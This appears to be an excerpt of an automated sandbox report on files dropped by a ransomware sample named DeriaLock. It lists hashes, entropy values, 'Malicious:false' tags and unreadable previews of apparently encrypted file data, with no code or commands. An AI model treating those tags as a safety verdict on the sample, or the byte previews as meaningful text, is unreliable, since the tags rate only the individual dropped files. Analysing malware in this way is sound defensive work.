                                                                                                                                                    Preview:N.>GJ`.....feS?n.*...sT^...}....I|........N%3.....z.{..v .....G.[m?..,.6F..2u.*...L....CI...B......:K...B.,]..m.GOSuHN...B.;Q....j....(=...j..H...`...^.b.y.O{.G..^Xmyo........Y.........H......y..w........(......n..(&.......cG*m..x..\.K.u`3(...........D}z)DW.x.......[.{.i....N.nq..../..%e.l%..7.#uQ7kq...j..l.....`..\..YO........c.43l.^......i.W.N3!....eAM.....[..w.......%.0.E..A...].. .|R....A.M...|.........N.......Es....@.r,zo."..vE......R...;....b[....Oz!.....-..Y/u'D.D:,c...j.:n.z..Zc,,.2...C.`..u-...'+...[...@.#..+....k...(.@g....\.]d..._.NQ..7^.....lU5..3..}.{....f.Wc.x#..1..kF..._...Dm...5......h.....;....l.:%.J.F....(A'.>:.jL...|RD....#.g.../..V.@.......H.. ..d...v...9.,ay..p...I.cT<*..o.`o.;.'i....X....{_...Z.......w4.D..H..t.......3c..f.....*4pd..9n......s.....!.t.....Y*..F.......:3#...-.....O....).._..cd.!%^....u..d)7&...w...JS.h.at..h..g[..).}..J......!<rs,h.A[()...QH...$...*..tJ.zj..sx..{.6....]`{."j...eO..T[.@.$......o........t.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.811320220208921
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:QSBo4HI53ToUQLzXjq8FHc3db8d9Z5U2ZmEtW4gquq:yJoUQfXjotgdZpAry
                                                                                                                                                    MD5:AC70AB2AB0CD02F3438307062D464C78
                                                                                                                                                    SHA1:FB26733D8708CF2166F5B246F9928655B2B3E79C
                                                                                                                                                    SHA-256:E2AD946C5048367E519D2D9D2BF9B42758DE6D0D79DCE2C8AE74ACF23125BED7
                                                                                                                                                    SHA-512:61C53C4BC1CDE2F835319699CC3FFD63ACA8FCC4FE40BB2A91F5F9C9597472D3D66CD9CE6DA2164D0C4B2F2A63E68376B5A30A59C2BC2D8FE4EB231FAFFB650E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.{.....r,..r.<....Z...j.v...O...Cc.....Na..W.A..|F.|..AL...j#....... ..9.D..B.=...}h....f....?...-8i.E'Hjr..p..Z;....g.7.7S.p3.-..=.........9e..5.W.'.FM..~(AcA.zK.lH.W.G.B.../...KXxp.. Cz.x.v.........eQB...5k...Z..qA&. 2H...).3~,.G.(.....or..R_..z...o@.(<Q!.aQ...Bo...~..B.\.......^hi.".:...|..qW*Q. .A'..q........S..g.2,....R=..+.h.aiI7.......J.b-.l....~.o.-.C}k5..<..,.............Hz..'.........J..V.T..-uv.le.......y.!.:[...+J.Xa....Y.v-...b*..y.F.. .e.O|u.^....[.R.....9..9..M.f..F.6Q...|.....f..OnA6....i'.8...."fIY.z.0l.i. ~+.:...y...Kr...............!w...7t..G?....r..L.ck&.0F...s...E.r?........L24G.%,...P...Rf...d.n.!4.9.....f.......r..|.[...hm?..Z.L..z<G...C=....~c.....?E79....c..Z..f.....>8..m\...>./..$H.jQ..Y.}&...3....?$.4c.."7..M.......1]kIt.F.Kg....43j.^.i....;.T.-..l.!gIi.B....J.=.wa..Q.6. .....>.C.W1;....Hm...?y0....G.K..is......Z./S.u..YR...[.]\.(^$.`...{..{f;1 ......q.e{......j..a.KO..W|.U..u. .MG..jn...{{*.......8C.x.X.Xi............D@
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.825153944537612
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:QW9hqQdNOJN+qGGjNZEC/XjwGp12i/u0QTIg7W3:QWWAEfRjvECLxpJKT77W3
                                                                                                                                                    MD5:0A73160EB6C46EFDB8985B309A99407A
                                                                                                                                                    SHA1:E988D24BF9C3A3BDF21E54849D11D1A81EDDFA29
                                                                                                                                                    SHA-256:C7F6E5E807BEC8BF54CF589D85C2BB7797888F9C27F9F51C1832B303BDEE5930
                                                                                                                                                    SHA-512:ADEF496A0071C870C338101DEC61630A9E1F3AEE8963CE017E83206F7531878FA835B72EA588D50CB23402ADE736B3405B0250C567FA38A6129790818106617F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:qT.2...SHQ...xL|....A....%...0.../cV.xL.O...%B..:..."._e,5jh.(b..>.......&....Q+...N.(.~.?....n..P`."...........?~.../..%f{..F.<5_..dT.:.fybp..=........x&.._.|K.uqbD....a(..~.;.1......K.;.6..Z`....jiF~......>.X.b.a$.....X......].....t.S.1.(.`hp.v..,FVZ&t".&.m..rQ..._g...(...i......hl....B.N+.zB.&.X....4O.F8..d*...o..a%7M..4.T.n(...\?...N..w;.....8w....A.....e..-....2B.w.8.S..(p..[i.....-A.5.......myS..lp>.i...V.V..4.JP.Y b..vwE.mt.4....C'.N~.D....De..z....E}......@D..d....Z4.mC..<..~.{....&LT..........G.EQ.J.+..%....h.....'tN..;..W...0.XL.{..Yb.qQ.D..f.._..Z.I7....$.UV....H...Y.;..m..`......M.\kx..$...:....}........$....e.?^..@.~..@.h.h.K..u..,..C...d....#....7.o....($.~...x.2..d.K.C..$.v..(.Q. .....v.6.`.bu....{2.g_.Y....Z.h......q$.k.!...V..d.".^...."...F..-../..Y.....m.....K....f..h.@.........>s..u.L....0U..r....G..c#=w!...`...E.6...B...|%..H....d.2.g^D.M*.W..m..|..Q..J&......Q..-.._i.CD.p.eN...O....(....:...p.)...KM....`.Q..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1040
                                                                                                                                                    Entropy (8bit):7.804347246889944
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:uxf1/v2nqbn/ulj3hDThOnCuuyMdxZE3vPbtKICcZR/oY+epdA:imqbn/ulLhDtOnDMdxZE/PbwIRZR/obP
                                                                                                                                                    MD5:DA152500255DE906468851C0612F7A23
                                                                                                                                                    SHA1:58E8FF3A253A4650BFDEE922BA6C868B9E078DD8
                                                                                                                                                    SHA-256:DBE375575912902DAB148AD51483AB9BFE7D6FA5B4F0E541D93F295C913BA41E
                                                                                                                                                    SHA-512:E97016515DAAD46627358898F2A720A6370DA10832503EEC35970F44DB8E571D221F5E4B0E92E9D5BA94FC8540CF8A77B76841FC8613FC122D81193EEB4B3D4A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:..~..xh.B..).GJq....3/..:J.pR..*Q..Rk6.Z3....qh...n.k.h?.Y....J.r.L2y....L....u8..P.tj..5..o.E...."....N<....-.R......r..J?X{ ............2......... ...2B.Mp.....r..F...T..sw.hS_F..6T.D....]I.&s.{.B..l._.e+...V....S.A6.J..j-...&....X;H....d.ih:.w.A.2..H\.'.'....)....tR.aqv..D...WrN.s..........[;..2.5N.*sW......K)....k...6...-..=P0..........._...7x"./zVL@....P.F..&.'..M<.............7R...NL.....;...`=..hD.,...6..)^4.....eH......J..q.tx.h.GE+f.!...F..S..R.x........(.c....*>..#:&...x.9>>..(...#......qJ.*..R.zM.9_.G"......U.h4..ML.. =>...if._BfL 0.).s.I..!W.%4...[.#. 6.... ...]2.30p....i....R.r.@b..G9Tp.p.....=E](.."X} ...(*..#Ix.w..4..c2.}.....T...ob.S<dpd../..M..\.69.S.1/.c...giUq.k.....v..w....~..s.....f..ql....U5....N./ .R....{....5.T.FI....e.X..BjN1.=.EE...Q.e.T.e....<#...H_=..\........{0._.{.....*.C%....l...........S.%%.....~..2:.g..6....Ck..[x.CF.....9%./yw..TZh...%=.<.%.L..A...S\.N.o..T....=.$.GZ....:..8...#=.{!.....".o]..%.{Kd\.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.808084258936246
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:n5rEBYpEmc2TgSFmFWHXmpcgi8Y48R3nkGwi4KLc9OfCROU4NnpY+h6mFt8:n5gKnc2TjFmJSgfvEeKCs/XhpYYX8
                                                                                                                                                    MD5:15A3851C68B3216B92EB83FE6DE41001
                                                                                                                                                    SHA1:C42780F16C5CCDEE95057C554E6CE1B472639AF2
                                                                                                                                                    SHA-256:DEE81C675B0F10329200B004CB52B94F0EBECD70D8046ABF968AD9270B22BA29
                                                                                                                                                    SHA-512:4B4DD1723BFC39400004EC644D7676885DC66BB54154312154558A7FB12D78C3277DB7CC7B9DF0A1A71BF8315FBD55559CD713F70C9CE380D5099F98A930B158
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.".[.f0J%..*....)c...V'0D..RDtMLB..."..2..S....`..&.|..d.a2.NT.f..UC..L.9..TJ...1.....r....Y..l..G@..Q.4.....J.a.y.....mMV.jv.^.k..xB......z........,....../'...e..\...Twg.K.xWus.fy..h....6.^....I...(.3dr.V.....^."j.m}R.k..&...E.......9..6.R....e..O.}...,....k.O.....m%...-.w.tT.t...hh._..#n_..m.9...t.....X.ezg.g.Ljl....*:..n......JR.7+.G5....t.T<=....O.!....qxa|6UX..].i.d...6^a>.....@....n.]/..sf..........h...>.;..Oj..~..#gC.gH.'N...X.........!.?...J..J2o..IB..S......z....&.7./....a.@.../..*?1]..T`.i.....6.a....^b...d.[u.d.?..C[KM@.P..t.,.....r.5..^..E....rD...N.I..../.e/yw.G..7.Z...*..6:..._..'.(W../6.........M..f.........8...\..}_N., .Z..w..#5.6H.Z..Q4....eJ.p..o.J*.....E..m.`V}5...t...YO.,h..JG$...8)..D.XK...4..R..Ps.J.....)sp.....".......j0.uO#..Bze..e..>D.QU..@3......vv..n....C....P.....^..l..?.p`.0.Z......M0x..|..*.7...S.......T,.c...E.}.T'.nRZ2X......V.....l.................../c...?..H. o.P....2.5.1..i(.u....qP.T..k..9...5...
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.8057412582244226
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:8m5fnCmQNs40P9Dk3wH7jEfYQrTC9gl/F5lVbE5LZCxp54pe:8Cqmwh0lrXaYQrTmgdF5Lw5LZCxpCY
                                                                                                                                                    MD5:7AD4D57D4A48B82AC50FCFB30837C527
                                                                                                                                                    SHA1:E9527DD06EB1A89F446D93326B71B6DCB0C3B226
                                                                                                                                                    SHA-256:E52250C1AF9E1009F51D9368D1E6BCD06D3DC81E32B97F292ABFAEE050ED9A58
                                                                                                                                                    SHA-512:71BEF7B693F28534E33E508B5161446DDB03B4E831DE2C1331B1C101FCA593A03A5997E69AAF0B2CF7329A026ACD2F314BF7362945DE8CF997260E2E2055BD29
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:q.a-.. ...+.>K+J...]J^*..RI...-~>...V%.:...8......\.....<...FH..Z...o.?Qm........:ye...a..b..Q..@|..QB.f$......i.7`..ku....dC\.=....SM......g...L.9..g.8...".f?...<.Y...?.OS."QA..A..H.....E.0..N...........k.J.z.t.......[.....>..?.wQ ..(...y.d....t..t.1\...amAuf.G...)..Zx.BE..44.*....K.`.Ex'....+w.._k..b...3...t..Wa........5......F...,"...f..YKGv-F..z....p.............9...Wf.......}.V_.y..^.../p6S..T.7.......V.K8%a.kxN.......gA.....*b.......A..Roah...$...bkoOK"h.J.X...0.0.vsC.H..9...G...C.`.{.+.C.. .......;o.&..SC/?..u..y..."...%.(.R=.)O....l.$.].XXh.R..4.".j...'....0..^s.uXW.p....9...."a..b.....Q.../..E.(.P..bo..O.A!..{.AI.........dq.gE....a.0S.....`y..z&.*..{.0........`..XR.....o.,N.....i...7.r.@U.ucl.ee..`.w.5.fsYU.....M.zg...........x.;.?..w.....Q>..W.}"c..Qv.lP..>.;....wbO..&.A...F|...8.e.......7..>r..2.]..{..,....O....]....8.M2...c..z.J.I..!!7..-..c..L..!.#1....5...P;...0..d,.B.R<..!h.......@.b..Q6..*.A?......D..h.Z.9O..m.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.8215263664677375
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:5mF8i1mdB4LrMGpBk5yt406J7vyeldCmuX9LqJVAm8eywEJRss1:gFL8fQME8vyCCmuX902zjas1
                                                                                                                                                    MD5:FE9ECAA79EB8667705D8D5F6AE4234CD
                                                                                                                                                    SHA1:3946E6B0B8B181E1B3BE73E4CAE2C020E2FA3CCB
                                                                                                                                                    SHA-256:ED4512E98AB50B90DD50DA1B37B10316A4B586C349014FDDB7F03872E9FC8D45
                                                                                                                                                    SHA-512:E66C42EC99844F707BA18735E41EFBEB113FBB07CBC05497572B08B0221AC736EB50E1E04B3154774CE88756CAC131813E690F795BE2B77F1DDB7883D4CC5017
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:....z)...l....Oj)..o.$.....W......\..E`c..g..;....n#e.........'q8....Q.q.....'.K..&.l.].......x%..Z..."=.V.P....<.e"]........c....3#.....NDmR...\.)._../....,o.\.#RM)x.....L.8..Vz'....7..nL..P.....@..i.Y..{..<]..TAI.fu...v....H..h&2..f..:.yR?|2.;yx..Ce........n&eT.|.k.........4..f.....{.N.i8)J....G..f)......qvk,;.v..1.....go8..).C.$Q$f.....'1Mn..&.....b.`..<.Hui..v..=iY..l.x.%.au..=v.../.e.w..I...A.+..P+...}..}...)...x...S1.....A........p..s.....`>.6..lA...Kf.7.t..S...1.l..Z.M...@.'d_....!#.....Y|.}E..b..&...../.S7..r......4-.................d.._.y.....d..~`i..Dpfv*3..9..>...d- ..k..Z}..\e..52..ve..:(.Z.R...G.k.q....e....LcP.li>X.jFI.ySt..T.....(.y...i.6.2z......~o........#....R........fxj.T.UHl{.U..|.!Gl....E]...e ...nz.=.R.x.%Jl....8.u.....&W.u...m...5CBN.Q..U...q.z.)...y.WxI.M..n.<.4...0.t...../e!7.6K._..d.....P.xc:.>.U..??..e..8EJ..qi...DH..m...G../..F{...3..O...3....K..KX..?!D.....^z..)6...z.$.e..v.dk....I.),........}J.'.}2.+.Q!1.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.803399768244561
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:XtJlOC3a63YwAA1T9YF0u/QXoXIzRhKVjJKlyU3khIClFK8vn:oC3l3AAcP/dXIz7ItKWFHv
                                                                                                                                                    MD5:F05825598EA0124965FEDF7C728D5141
                                                                                                                                                    SHA1:5FE484D577EB81F2B3599F5F408879B04A4BF0D3
                                                                                                                                                    SHA-256:7E80D88B5BBAD1DDC21D8E13B8B9218080920901507CE0FA63C6D0D73FBDAD5B
                                                                                                                                                    SHA-512:C989EE86FD7BF858A8D5D6709300AC2E0612B085D21509291E5BCB36590B7B83DDC12CEB89497C24235882475F8A555A893DF3003B4896981197D1950B3A7613
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:{|.;.8+.y..7g--."...Z..z..l...VK.......]n5.......ojm.,...z%.+6x...8.N;...>9..~..W..O..h~...Z.:p...+W.......l.0.))p%k.,C..Tf.3..k...c..!....8...'.G..J...hIU.M.*...f..Y[..I.......u......F[..'C.I.F..Fcw.3...2.=r..=u.....]...3..o......b..F...)......u...%..HF..X3a.Sb...........E...:..S....e.....v.EV.Sh...:..:p.l%. '_D.C".b#V..v....W.u .~.I...5..>.Ac.....1.)6.w.......q.v.5...=n.(Qn.#S..k8.......{.i..&...\...Hy..."...."...}...._...w..i...Xo.........KL...f.w-..jwR..m]........e...........g..M;x_...g.t.Y..{..9.o...._Pg@.E.\f.40...) ^..b.....A...Y.g...2.....@..I......-.^~.+..WH...6..6A./.n..,4(.......x..w....IG.z..L0...%.2Z....1............b...F..2X ..<1X....}..../.O...p..^...-.....i..h.Y._..O...k..9V....6...8.....[f<...v.......o..k..O.D)...+.....Q..".0...X......u....4..W.Sj=vO.::~t.=......~...[16..8J.l........s,%1..0.z.x.RL.=...dJ..........i.7..>.Q.nc.\".JE.Fj..b./h]d][....vt.. ....VB.....y..@s..........c..K...o.....,....e....R~h..wF.W..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.805930069599574
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:AHuzfQLY3R/Voiemdmo6qsHDTL1kD79eGcYplbF7ha1+EqW4ZVKQdGfL:AbuR/Wiewl0nL1wZQ6lbFPEd4ZtdA
                                                                                                                                                    MD5:B5380463DA70AA7B27A4BA038D5D31EA
                                                                                                                                                    SHA1:31AC6FE855335F07CAC68AB473FD8B722AF203B0
                                                                                                                                                    SHA-256:36A30A4F46839D46CB7795990E5F3C11FD3B62DA4646092290E1192EE27334AD
                                                                                                                                                    SHA-512:0822C5898DBEF9B2AF181523010D664AA6550706E2C6A7C83D2542905167BFB2C0D5FFE74C29653A969DA02B953CB277628CB58A82F1AAFD859AC5E0C4F4B736
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:v....@...f]..B...M/.....x..v.Ml.......n*..l.0..k:^yB......*b+.`.3..b./..CY..].V...)9o.,.9.Z.yF3.}.....Fq.8.....a~..6F]k.....E....G....s}...w.Y...T.....nH9.,....{8.....C...... 5......q....4S..q.d..FG..y.s........p.'B.t.z.GT.a...............x..e(....S.J.A&.m.O..t..D.z`0p.ii<[=..s....y......G.[.!Q..q......Jv..E&.GA.........q...jO....lH$L...h.._...9>:..i4{rW".".QW"....Q....qz.[A....d}.R{......oJD.....;@...e.../8O.!.K..l_..~..w.i.9w.A.'..,...M.2?=..@.1..d...'.......g\o.V.....b@.s......ZUYE........ST..t}..W.|a........Q...r..C.-n$....T-..(..=.k69=+.KA.....J...H)c...[.....4.....j-.L..=.6^...gR."D.....EbrJt...J}......3..#..C.*...WNpW.P@Vt..T.....[P..p..w......R..I.(G.)D?....J.h...w...0..7...b.vo.q}.;x..s]...R.%fb=......@*.....(;=[-s:.F@.......L..x..b.B;X.............h......[(:R.wg ._..i..g>d(:t.V...b...../e.$...N.......9g .7.W6....#n\$...C....JN..:r..@.......ib,....'pO..._..o...........d.P.1..nsT:.Z'}.-..A.^...!.....*.[A.:.0......C.T-..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.821401061930976
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:ZfEBofJQSmjCJH6rxZC+PmJF/EcLKhFh1M+y+6SOe:FnfKdCH66bJF/EGKXd6SOe
                                                                                                                                                    MD5:363C3A3D603230539725922F8342F578
                                                                                                                                                    SHA1:3FECD68CDB190B171C8649C99D4F646EF0910D22
                                                                                                                                                    SHA-256:AB8FC820C3B19735E0C8566EA33406C4746FC6744B99CE42B20990C6DDD11C54
                                                                                                                                                    SHA-512:F03F3D5064081772666793699E1871B5B25DCB912EE5D9C61153195EC7DEAD0AC27300F23DA537C704001C38918DB00FB78C31C26C4EBAE3D835FD5A67620703
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.+...T.d....&..>,.X...WT..)..G..<.....V.L..........D.Z.X..|..3.Fe.M.g .7....E.I?..e..*..;2.+.q&d...=.....n...._....Q.:.HT..2bK.&.vU{...!.a..LV..d..b/E..m..(...q........X.OD.f......oJ...r.~..,%.\q........'t.I..m..C.....~...w.*..C...a.M..v.:.1..O..._...E........J.....H.v...8[.....n?.Q...(7.W..QJ....EB.F...;um%.n..k.:...s>4.j.........,.M...%rp.AFc....(/......R.tw'c.U../.........o.....}.FqC.;\o...x.Xu...#2.C..k.A......VQ.I.\Jr2EY~.../....$..u/....Ea...`...a1N..;Aj..D...I].l5...ZC..T.bY..+...Z._,...s.x[..P.3.tVO..E.Z4..6.........z..&>Z%....s.u..w... .1.4.h.S.2m.o.......t.fK3...6.r>.........j4..Al.`N|.....B.P.!...Y...rF._....b....],...Y?.K...&..\...b...y...kj.fl....s.i.Pm.b.b4v..L&B{..%.:.pVx.0l....8.....^..1#..'['L....p...M.}n..+.v..j_.v........".-......$.Om.!\//Q...8...T...........\.c......*yL}/....6.q2...0.].~...m.....?,e...XM.X.d.....2.."dm*....''...D..\...aS......J.~.x7..N;,X ...#.M>.A..M.l.a.._.`}J....W..'..R.N..i.].....1.[.BcR.j4...M...9..U..5
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1040
                                                                                                                                                    Entropy (8bit):7.8194725664757545
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:K1poqy3VhMKyihASs6JYRTrYk8lpD/9Yopxz0M+cXMd:Spoq+MKcSdJ8Hd8jDaCz0M+uA
                                                                                                                                                    MD5:520C0758941D0D6616248878C0DA3B14
                                                                                                                                                    SHA1:E57131027EC43F92931385FC6EA9A68DFEF2CD10
                                                                                                                                                    SHA-256:C11D179E060D0F716271A0E84E526C37ABAC73B957F7C835CAB2E1739E9DF009
                                                                                                                                                    SHA-512:F32CA0E9CBF1DBA2DF0CA00E78E994576D15A5D4C30D4D03217DF7D4109B0F4ABD8C9B00E463FB3BB521A7C607D3E8703DFF38735D59D65DF69778047D9DA57C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:)....uO|E.N...kef&tXC\.1..........T}...#....d.x.1.........l.%..V.:..J.. ...0.a.(R....cE.m..k........n...jz......f...v....x..$}'.j.U:........aa.<......W....H.5.:.....F.H..~;.......?5.Z6..:...[.P..3.U....*.i.0...L...{%..CT.QM.H.N#.....p#.9..yNK5.u.z...p.v.-o*W..@t.......}..{0..Y.G.=..u}...*..Z..m.....4/8....`0..r..v\.e..*.{4..d.3J...`.7k..'%...O}.....;..p&##~G.w.<y%.Q8..._"...Xo.m 6.>.........a..\.l.fk..kKa....Q4u..k..G....S.BN...0.....V.P..a@..O.]q..1....1....|gk....}.mi...7o.7[7.j.2.....<.w..>..W.....D............yX<.'.c...+.h._ .z:.R...VQ..l..Qu.Y.(v....P.g'......#.-G't.O.Q..=.vk.}..........T.......e&..!....wt......VKQ...)...Y...UL...vN.....jB..n..wSC\.x..UJ.....cP...j_..y}.t..+hx......z.dM.N"JS..9f(V#*.s..}..*..cG....J8....u.A.._i..r.&.......`.FQ-Y....S.....v..I=...U...U.M..e|...,..3....X...H0.6{..;..x\....._..v..P.Q.6.oX...t.c.x.Q.0M....z.].U.Y.].+...@D...j]...z....]..Pt..7.........S.S..%tyF.Z..n...M?U.VaPh.\..a;.._...[..8']....b.l...
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.801635532270652
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:c0NDBOLgq1Jq4vp42syn+2PvuqLtI97uDbPPs8TssdYYkJTnhu:coygo9vwXAvNa97YY84suhu
                                                                                                                                                    MD5:36DBC7545B4CFF3C33B6875E58FA328F
                                                                                                                                                    SHA1:05C97D0966D10B4D564B26705C92548B60AA573F
                                                                                                                                                    SHA-256:ABE9C21A58ADAF9BE76454BAC0F0A2B0C0BFA9F90FFA899D4DA10C8CED7F40E6
                                                                                                                                                    SHA-512:D8006CA251066105C5C6CA1D75E93097F6B7494F2DF795C0D8DB37E7E028FE9F8DC742EB23A13ECF77D82D17653821389AE65445724A09CF589D78FB567B8E19
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.Y..T..lL...p{-I.k......... Y.9_...W.w....6.@.W..BJ..5..z.........~'..T\....~"../....)%.)....yV[;.~\.c..e-f......`9..a9N*\.../U.Qr.d;=.8.7.!l_.../..oa;....p......\}.q.5g....N........<...I7$V.....H..1r.].l.V.. /ntH....*..6,.AI9rs.Y..>.........r..|p..)^.d.........".0A....M9U.......W.%....m...du.y.t.U._yB.D.x...f#.)-]'..r.F....V...V9.K...O)~.(.1...y.~.r7Q..)...e....0BG4'..(3.L..!..r|..&..#..?t.....u...Wo...A.;.R.....|.7.....W.m.9.hj.HW\{=\j.u.(.&.U....R..}....._...DW....._..y..........o..0.....[..+gw.i..A....^.VxSh..cv.yU...A......H...y..-:y..1.F.LV7OKQ...*.....>.....C.x&.?p~..{.K.X..(..`A..O*..w.s-.......R...,D....i..~.;.....3^W.(<..v\ ...m.N....;.`.?Q8'....hS.Qe6..*l.7& .7#..e.2.Uz.K..+..4.E.-.F...........t...-?o.9z.....t...X...~9c.O.4...t#.}..'.]....{......:/..#...].....8xa.K........&T;....xp.F...N<.,.\!.Q..~.....bG..$..X. 7....O.)..B_..T....1..#.X~.....N..oH.f....!.g[0&~K....uGeS*.\.\.E....{..N.C...6R.I....._6...X{..J..I.a.%}.ayl
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.807801225836408
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:t8G9c3wsoAw/6EsRZTcKtNCnE7HuGtubO3JzigLlcHc/J9En:tRfK5ZTcKHCnEqbbEZcHSE
                                                                                                                                                    MD5:15B8BB29B4BA29CCA00F135FA284DDE9
                                                                                                                                                    SHA1:2151BEABCD6FAB3B7E7783BC7424D7F23AD21C58
                                                                                                                                                    SHA-256:5D2617CEBCA98A38F84B648B3AA21DD334B6279AC400ED91467C707CA9ECD983
                                                                                                                                                    SHA-512:C84081064F5E3801A023364C07D214BB5075C1F7A3AF1865F98AD55B78706EF1D68C1A728D2D37699D0E5D855224C36364A4F0CDE1E6B498A7F09213634564D3
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.+fU.y..mL........X;.....>L...|.S....5?.t...c.~.t.2v',......i5t%..!..)..O....8.L..p...$.$J..=y..4.......}.T....o...@._.7t.......'..e....v..L.6k....{............a..4.J.\...+.{gj..hU...2.`|..7.D.,=...m)..........)g............c.3.%..~$?%:V6.....i.].n...G.e.^/...I?[tV...T....s).F..X...S..x.RN. ),vdYG.G...]......YR.2~..H.<....C.E>"...~.+.KH.I...HQ......`.x...p_..[.w_...s.nY.......A`Fv.........K.r..U.S..v?G...... .....[wA~V....}e.X{A<.@..G.8..A.....k....%F.0.?..X.Zv.hn.J........4..\...o].h50.}?.]....~..@,.i.xK..............i*..a6....?..MQ..>.oN.<P.vh...x=...$..k.....Q7.x..I......n}...R..s.d..AmR._.....N..2w.v...6..Lq...>&Yd.\..7..S..W>_.x.s.M3A!...5....q......#..<....D..<x317.-......~q..N.....K..x.x.....E{....[.h.c1......."mA....c..U>.&.uw.nS4A.1.6<...j..k..\...DU.k{....."..m....B.?.........4w.....}............<..d.e.TS%.;.<N>L.bM?I.l.F.[.....%..-.[.Z.!%....S..p6.}......~.e.&~.........:TR.f..6......S../........{.........6.....Ik.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.8266314774120165
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:nE3A6VC5Vm9+pjVmzvWyv/cg917OHQwHEqfJRZUXbyAqA1e0YT68GO:nEE5G+tiWyv/q1HEqfYyAqrLTTZ
                                                                                                                                                    MD5:24CBD65F0607CB49143F281966053995
                                                                                                                                                    SHA1:17FBB95D1D5E87C36EC821D2A01E1EE5966E9DDA
                                                                                                                                                    SHA-256:D3E1B57B989B0CE642D6B74C86A6058BAC4618F74F8F36B09DB7FA3D3E078C5B
                                                                                                                                                    SHA-512:DAFD97800E835C3FD887B9B71038B5B3B733811FF346E8737477AFC2714D7C2D2DBD2B89A762B4415D0E120D9B1B2F10F54495A243518BF16918BFAC7FD2FC15
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
